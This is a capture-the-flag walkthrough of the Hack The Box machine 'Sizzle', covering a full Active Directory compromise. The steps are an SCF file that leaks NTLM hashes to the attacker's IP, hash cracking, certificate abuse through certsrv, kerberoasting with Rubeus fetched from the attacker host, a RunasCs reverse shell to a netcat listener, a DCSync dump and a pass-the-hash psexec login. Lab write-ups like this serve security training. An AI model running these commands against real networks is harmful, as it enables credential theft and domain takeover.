HTB - Sizzle

Machine Info

Sizzle is an insane difficulty Windows box with an Active Directory environment. A writable directory in an SMB share allows to steal NTLM hashes which can be cracked to access the Certificate Services Portal. A self signed certificate can be created using the CA and used for PSRemoting. A SPN associated with a user allows a kerberoast attack on the box. The user is found to have Replication rights which can be abused to get Administrator hashes via DCSync.

Enumeration

---

Scope

IP Address: 10.10.10.103

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn 

PORT     STATE SERVICE          REASON
21/tcp   open  ftp              syn-ack
53/tcp   open  domain           syn-ack
80/tcp   open  http             syn-ack
135/tcp  open  msrpc            syn-ack
139/tcp  open  netbios-ssn      syn-ack
443/tcp  open  https            syn-ack
445/tcp  open  microsoft-ds     syn-ack
3269/tcp open  globalcatLDAPssl syn-ack
5986/tcp open  wsmans           syn-ack

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ sudo nmap  -sU -p1-10000 --min-rate 10000 $ip -Pn 

PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
389/udp open  ldap

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel2]
└─$ nmap -p21,53,80,135,139,443,445,3269,5986 -sCV $ip -Pn -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
53/tcp   open  domain?
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Microsoft-IIS/10.0
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp  open  ssl/http      Microsoft IIS httpd 10.0
| tls-alpn: 
|   h2
|_  http/1.1
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
|_ssl-date: 2024-07-27T20:49:20+00:00; +6s from scanner time.
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
445/tcp  open  microsoft-ds?
3269/tcp open  ssl/ldap
|_ssl-date: 2024-07-27T20:49:20+00:00; +6s from scanner time.
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2024-07-27T01:09:23
|_Not valid after:  2025-07-27T01:09:23
5986/tcp open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: 2024-07-27T20:49:20+00:00; +6s from scanner time.
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2024-07-27T01:09:23
|_Not valid after:  2025-07-27T01:09:23
| tls-alpn: 
|   h2
|_  http/1.1
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-07-27T20:48:39
|_  start_date: 2024-07-26T17:19:10
|_clock-skew: mean: 5s, deviation: 0s, median: 5s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

* Open ports: 21,53,80,135,139,443,445,3269,5986
* UDP open ports: 53,88,389
* Services: FTP - DNS - HTTP - HTTTPS - RPC - SMB - winRM - LDAP - KERBEROS
* Important notes: Anonymous FTP login allowed - commonName=sizzle.htb.local

Update hosts file with domain name, FQDN and computer name

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Rebound]
└─$ sudo sh -c "echo  '$ip htb.local sizzle.htb.local sizzle' >> /etc/hosts"

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Rebound]
└─$ tail -n1 /etc/hosts
10.10.10.103 htb.local sizzle.htb.local sizzle

---

DNS Enumeration

Zone transfer failed

dig axfr htb.local @$ip

; <<>> DiG 9.19.19-1-Debian <<>> axfr htb.local @10.10.10.103
;; global options: +cmd
; Transfer failed.

RPC Enumeration

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sizzle]
└─$ rpcclient -U '%' $ip

rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED

KERBEROS Enumeration

I can't get any user from bruting kerberos.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sizzle]
└─$ kerbrute userenum --dc $ip -d HTB.LOCAL -t 100 /usr/share/wordlists/seclists/Usernames/jsmith.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

2024/07/27 17:01:09 >  Done! Tested 48705 usernames (0 valid) in 211.838 seconds

LDAP Enumeration

No thing also from ldap

ldapsearch -H ldap://$ip -x -b "DC=htb,DC=local" sub '*' -D username -W password

<snip>
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v3839

HTTP & HTTPS Enumeration

subdomain enumeration

┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u http://$ip/ -H "Host: FUZZ.htb.local" -fs 60              

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

:: Progress: [19966/19966] :: Job [1/1] :: 263 req/sec :: Duration: [0:00:59] :: Errors: 0 :: 

┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u https://$ip/ -H "Host: FUZZ.htb.local" -fs 60 -k

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

:: Progress: [19966/19966] :: Job [1/1] :: 263 req/sec :: Duration: [0:00:59] :: Errors: 0 :: 

Both links http://htb.local/ & https://htb.local/ lead to the same page

From wappalyzer extension, the webapp runs with ASP.NET technology on IIS web server

Since we are dealing with IIS web server, I will try fuzzing for directories with ISS.fuzz wordlist

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sizzle]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/IIS.fuzz.txt:FUZZ -u http://$ip/FUZZ

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

certenroll/             [Status: 403, Size: 1233, Words: 73, Lines: 30, Duration: 226ms]
certsrv/                [Status: 401, Size: 1293, Words: 81, Lines: 30, Duration: 227ms]
certsrv/mscep_admin     [Status: 401, Size: 1293, Words: 81, Lines: 30, Duration: 194ms]
certsrv/mscep/mscep.dll [Status: 401, Size: 1293, Words: 81, Lines: 30, Duration: 219ms]
aspnet_client/          [Status: 403, Size: 1233, Words: 73, Lines: 30, Duration: 228ms]
images/                 [Status: 403, Size: 1233, Words: 73, Lines: 30, Duration: 195ms]

/certsrv requires http authentication

/certenroll gives Access is denied

I can say that the machine has Certificate authority installed on the system.

SMB Enumeration

Anonymous login is enabled along with guest account.

┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ smbclient -N -L //$ip

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        CertEnroll      Disk      Active Directory Certificate Services share
        Department Shares Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Operations      Disk      
        SYSVOL          Disk      Logon server share 

┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ crackmapexec smb $ip -u '' -p '' --shares 


┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ crackmapexec smb $ip -u 'guest' -p '' --shares

SMB         10.10.10.103    445    SIZZLE           [+] HTB.LOCAL\: 
SMB         10.10.10.103    445    SIZZLE           [-] Error enumerating shares: STATUS_ACCESS_DENIED

SMB         10.10.10.103    445    SIZZLE           [+] HTB.LOCAL\guest: 
SMB         10.10.10.103    445    SIZZLE           [+] Enumerated shares
SMB         10.10.10.103    445    SIZZLE           Share           Permissions     Remark
SMB         10.10.10.103    445    SIZZLE           -----           -----------     ------
SMB         10.10.10.103    445    SIZZLE           ADMIN$                          Remote Admin
SMB         10.10.10.103    445    SIZZLE           C$                              Default share
SMB         10.10.10.103    445    SIZZLE           CertEnroll                      Active Directory Certificate Services share
SMB         10.10.10.103    445    SIZZLE           Department Shares READ            
SMB         10.10.10.103    445    SIZZLE           IPC$            READ            Remote IPC
SMB         10.10.10.103    445    SIZZLE           NETLOGON                        Logon server share 
SMB         10.10.10.103    445    SIZZLE           Operations                      
SMB         10.10.10.103    445    SIZZLE           SYSVOL                          Logon server share 

I will mount Department Shares locally for easy exploring

┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ sudo mount -t cifs "\\\\$ip\\Department Shares" ./share

┌──(kali㉿kali)-[~/…/machines/Sizzle/share]
└─$ ls    
 Accounting   Banking         Devops    HR   Infosec          Legal   Marketing   Sales      Tax     ZZ_ARCHIVE
 Audit        CEO_protected   Finance   IT   Infrastructure  'M&A'   'R&D'        Security   Users

Shell as amanda

ZZ_ARCHIVE has several files & Users has users' folders

┌──(kali㉿kali)-[~/…/machines/Sizzle/share]
└─$ ls ZZ_ARCHIVE 
 AddComplete.pptx        LimitInstall.doc       'anony-(externalcell).xlsx'     test.doc
 AddMerge.ram            LimitStep.ppt          'anony-(frameset).docx'         test.gif
<snip>

┌──(kali㉿kali)-[~/…/machines/Sizzle/share]
└─$ ls Users 
Public  amanda  amanda_adm  bill  bob  chris  henry  joe  jose  lkys37en  morgan  mrb3n

I will try to write a file on each directory and see if I have write access to one of them.

┌──(root㉿kali)-[/home/…/machines/Sizzle/share]
└─$ for dir in $(find . -type d 2> /dev/null);do touch $dir/file.txt;done

touch: cannot touch './file.txt': Permission denied
touch: cannot touch './Accounting/file.txt': Permission denied
touch: cannot touch './Audit/file.txt': Permission denied
touch: cannot touch './Banking/file.txt': Permission denied
<snip>
touch: cannot touch './Users/joe/file.txt': Permission denied
touch: cannot touch './Users/jose/file.txt': Permission denied
touch: cannot touch './Users/lkys37en/file.txt': Permission denied 
touch: cannot touch './Users/morgan/file.txt': Permission denied
touch: cannot touch './Users/mrb3n/file.txt': Permission denied

I will then search for file.txt and see if It was created successfully in any directory

┌──(root㉿kali)-[/home/…/machines/Sizzle/share]
└─$ find . -type f -name file.txt 2> /dev/null
./Users/Public/file.txt
./ZZ_ARCHIVE/file.txt

So, I have Write Access to ZZ_ARCHIVE & Public folders , I will try to put .scf or .lnk file to steal NTLMv2 hash if any user enter the shared folder.

The structure of the file looks like this.

┌──(root㉿kali)-[/home/…/machines/Sizzle/share]
└─# nano ../@rce.scf
[Shell]
Command=2
IconFile=\\10.10.16.7\share\legit.ico
[Taskbar]
Command=ToggleDesktop

Putting the file to the share.

┌──(root㉿kali)-[/home/…/machines/Sizzle/share]
└─$ cp ../@rce.scf ZZ_ARCHIVE

┌──(root㉿kali)-[/home/…/machines/Sizzle/share]
└─$ cp ../@rce.scf Users/Public

I will start Responder to listen for incoming connection

┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ sudo responder -I tun0                                                                                                          
[sudo] password for kali:                                                                                                           
                                         __                                                                                         
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

<snip>
[+] Listening for events...

Get a hash

Starting hashcat to crack the hash

┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ hashcat -m 5600 ntlm.hash /usr/share/wordlists/rockyou.txt
<snip>

Cracked successfully :)

Verify with cme

┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ crackmapexec smb $ip -u amanda -p 'Ashare1972'

SMB      10.10.10.103    445    SIZZLE    [+] HTB.LOCAL\amanda:Ashare1972 

Although the credentials are valid, I can't access the machine with winRM

┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ crackmapexec winrm $ip -u amanda -p 'Ashare1972'

HTTP        10.10.10.103    5986   SIZZLE           [*] https://10.10.10.103:5986/wsman
WINRM       10.10.10.103    5986   SIZZLE           [-] HTB.LOCAL\amanda:Ashare1972 "The server did not response with one of the following authentication methods Negotiate, Kerberos, NTLM - actual: ''"

• I will continue to enumerate the machine with this credentials including

  • Share Access

  • Bloodhound Collector

  • /certsrv authentication

This time I have read access on CertEnroll share

┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ nxc smb $ip -u amanda -p 'Ashare1972' --shares

SMB         10.10.10.103    445    SIZZLE           [+] HTB.LOCAL\amanda:Ashare1972 
SMB         10.10.10.103    445    SIZZLE           [-] Neo4J does not seem to be available on bolt://127.0.0.1:7687.
SMB         10.10.10.103    445    SIZZLE           [*] Enumerated shares
SMB         10.10.10.103    445    SIZZLE           Share           Permissions     Remark
SMB         10.10.10.103    445    SIZZLE           -----           -----------     ------
SMB         10.10.10.103    445    SIZZLE           ADMIN$                          Remote Admin
SMB         10.10.10.103    445    SIZZLE           C$                              Default share
SMB         10.10.10.103    445    SIZZLE           CertEnroll      READ            Active Directory Certificate Services share
SMB         10.10.10.103    445    SIZZLE           Department Shares READ            
SMB         10.10.10.103    445    SIZZLE           IPC$            READ            Remote IPC
SMB         10.10.10.103    445    SIZZLE           NETLOGON        READ            Logon server share 
SMB         10.10.10.103    445    SIZZLE           Operations                      
SMB         10.10.10.103    445    SIZZLE           SYSVOL          READ            Logon server share 

When viewing the share content, I find interesting files

┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ smbclient -U amanda "\\\\$ip\CertEnroll"       

smb: \> ls
  .                                   D        0  Sat Jul 27 13:19:47 2024
  ..                                  D        0  Sat Jul 27 13:19:47 2024
  HTB-SIZZLE-CA+.crl                  A      721  Sat Jul 27 13:19:47 2024
  HTB-SIZZLE-CA.crl                   A      909  Fri Jul 26 13:19:32 2024
  nsrev_HTB-SIZZLE-CA.asp             A      322  Mon Jul  2 16:36:05 2018
  sizzle.HTB.LOCAL_HTB-SIZZLE-CA.crt      A      871  Mon Jul  2 16:36:03 2018

Download them all

smb: \> mget *

Get file HTB-SIZZLE-CA+.crl? y
Get file HTB-SIZZLE-CA.crl? y
Get file nsrev_HTB-SIZZLE-CA.asp? y
Get file sizzle.HTB.LOCAL_HTB-SIZZLE-CA.crt? y

I will make Enumerate share access done in my notes and switch to collect data with bloodhound.py for further enumeration and go to /certsrv page

┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle/test]
└─$ bloodhound-python -u 'amanda' -p 'Ashare1972' -ns 10.10.10.103 -d htb.local -c all --zip
INFO: Found AD domain: htb.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (sizzle.HTB.LOCAL:88)] [Errno 110] Connection timed out
INFO: Connecting to LDAP server: sizzle.HTB.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: sizzle.HTB.LOCAL
INFO: Found 8 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: sizzle.HTB.LOCAL
INFO: Done in 00M 20S
INFO: Compressing output into 20240727180002_bloodhound.zip

I Uploaded the zip file to bloodhound and go to /certsrv

After Authenticated to webapp, It leads me to this page.

I will click on Request a Certificate

Click on advanced certificate request

It asks for Certificate signing request .csr which can be signed with a private key, and I don't have one, So I will generate my private key and sign a .csr file with it.

To login to the machine, I need to have certificate signed from Certificate Authority (CA) of the domain along with the private key with which the certificate singing request was signed.

Generate the key and csr files.

openssl genrsa -rsa -out amanda.key 2048 # create private key
openssl req -new -key amanda.key -out amanda.csr # create csr

┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle/test]
└─$ cat amanda.csr 
-----BEGIN CERTIFICATE REQUEST-----
MIICijCCAXICAQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUx
ITAfBgNVBAoMGEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcN
AQEBBQADggEPADCCAQoCggEBAMEl4n1gXzoPDb667AQDphYrnfjXwe3zNwXsniR4
SJSmyEUUrI9iw/j2zDdWVq3+5VL1nV0JK7mgwTc4XdPfI3FmWL6SHCSTCRf0aZ/M
zXf+/dSgTNBPTqWSJN0s8uBRI+FmqnPeaTjo+UMHeqAWxtPzPMkXN90sFbfvqdDw
YtgyxayUrkRffw8T20PZn78LnT6qYX6qMCVle/XxSKKJq/eA+rdIxx3tNoztKbl4
o6pqmvQVpz3Bw6fK+2H/Cgi5QUrdDvV09+33RgdZ9eSlH1u5qTJht+9QMjKPilfs
hEat5JJN40MrtDTg+rU/5iHD/7jE4brwS16ok+l/u8bzeWECAwEAAaAAMA0GCSqG
SIb3DQEBCwUAA4IBAQBQ3yOrhynfPiWtuxZ5BGcL88f9nPYhJ8osR0vtLEmaliGP
cRwIIS37dOH+wOyRvPe//eda6MmLqc91KqlmjCtKO2UquBaeO68DaAL2R46W2a7L
3cUN7Sei8TgWv+dT+kWYma3RsJBZK+R9i1WxMmxGtkyOXgb1IOG9kw5/RUKKLfnQ
jmw2OyU7WQD2Ma57y3Ms7BYzLfQsusuYUOCtmCbIduvpApHn2OFU21ze3+c5w+f1
Y+B0AcEoT6FwjolfIvcoTR9AEnHDJryDht2qzcZqISCTbhoqRQAX079vJnBJ3cwO
94PdJkXsEQujKKxAQyzhG2VAipTBu4Ud2gK22RKg
-----END CERTIFICATE REQUEST-----

Paste the csr

Click on Download Certificate!

• I will use evil-winrm with the following options and enter passphrase when promoted:

  • -S enable SSL

  • -c accept Certificate file

  • -k accept private key

┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle/test]
└─$ evil-winrm -i 10.10.10.103 -u amanda -p 'Ashare1972' -S -c certnew.cer -k amanda.key

Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\amanda\Documents> 

From impacket toolkit, I use GetUserSPN to find account with Service Prinicpal Names that can be kerberoasted

┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle/test]
└─$ impacket-GetUserSPNs htb.local/amanda:'Ashare1972' -dc-ip 10.10.10.103 -request                   
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

ServicePrincipalName  Name   MemberOf                                               PasswordLastSet             LastLogon                   Delegation 
--------------------  -----  -----------------------------------------------------  --------------------------  --------------------------  ----------
http/sizzle           mrlky  CN=Remote Management Users,CN=Builtin,DC=HTB,DC=LOCAL  2018-07-10 14:08:09.536421  2018-07-12 10:23:50.871575

When I tried to perform kerberoasting attack from Linux, it failed, So I will attempt it from windows.

When I tried to upload any tool to the box and execute it, it failed, So there might be something preventing me.

We are in Constrained Language modelCLM

*Evil-WinRM* PS C:\Windows\Temp> $ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage

Also, after I Queried AppLocker policy, I found that I can run programs in tmp folder

Evil-WinRM* PS C:\Users\amanda> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollection 

<snip>

PathConditions      : {%OSDRIVE%\tmp\*}
PathExceptions      : {}
PublisherExceptions : {}
HashExceptions      : {}
Id                  : d754b869-d2cc-46af-9c94-6b6e8c10d095
Name                : All files located in the Program Files folder
Description         : Allows members of the Everyone group to run applications that are located in the Program Files folder.        
UserOrGroupSid      : S-1-1-0
Action              : Allow 

<snip>

Shell as mrlky

Evil-WinRM* PS C:\Users\amanda> cd C:\Windows\Temp
*Evil-WinRM* PS C:\Windows\Temp> curl 10.10.16.7/Rubeus.exe -o .\R.exe

Performing kerberoasting against mrlky user with Rubeus.exe

┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle/test]
└─$ hashcat -m 13100 mrkly.hash /usr/share/wordlists/rockyou.txt

<snip>

Cracked :)

I will then upload RunasCs.exe to the machine to get a shell as mrkly

*Evil-WinRM* PS C:\Windows\Temp> curl 10.10.16.7/RunasCs.exe -o .\RunasCs.exe

*Evil-WinRM* PS C:\Windows\Temp> .\RunasCs.exe mrlky 'Footxxxxxx' PowerShell -r 10.10.16.7:443
Enter PEM pass phrase:
[*] Warning: The logon for user 'mrlky' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-2e2163$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 2888 created in background.

Receive the connection with nc.

┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ rlwrap nc -lvnp 443 
listening on [any] 443 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.103] 55772
Windows PowerShell 
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
htb\mrlky

Get user flag

PS C:\Users\mrlky> type Desktop\user.txt
b31ca0c7a5bcc77a55xxxxxxxxxxxxxx

User Flag: b31ca0c7a5bcc77a55xxxxxxxxxxxxxx

Shell as Administrator

From bloodhound, User Mlky has DCync rights, I can take over the domain by dumping ntds database.

┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ nxc smb $ip -u mrlky -p 'Footbxxxxx' --ntds --user administrator                 
SMB         10.10.10.103    445    SIZZLE           [+] HTB.LOCAL\mrlky:Football#7 
SMB         10.10.10.103    445    SIZZLE           Node MRLKY@HTB.LOCAL successfully set as owned in BloodHound
SMB         10.10.10.103    445    SIZZLE           [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
SMB         10.10.10.103    445    SIZZLE           [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         10.10.10.103    445    SIZZLE           Administrator:500:aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792xxxxxxxxxxx:::

OR with secretsdump.py

┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ impacket-secretsdump htb.local/mrlky@$ip -just-dc-user administrator
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792xxxxxxxxxxx:::

Access the machine with psexec.py

┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ impacket-psexec htb.local/administrator@$ip -hashes :f6b7160bfc91823792xxxxxxxxxxxxx
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on 10.10.10.103.....
[*] Found writable share ADMIN$
[*] Uploading file APWgGeJS.exe
[*] Opening SVCManager on 10.10.10.103.....
[*] Creating service Kabl on 10.10.10.103.....
[*] Starting service Kabl.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Get administrator flag

C:\Windows\system32> cd C:\Users\Administrator\Desktop
C:\Users\administrator\Desktop> type root.txt
c3d8011c9688feccaxxxxxxxxxxxxxxx

Root Flag: c3d8011c9688feccaxxxxxxxxxxxxxxxx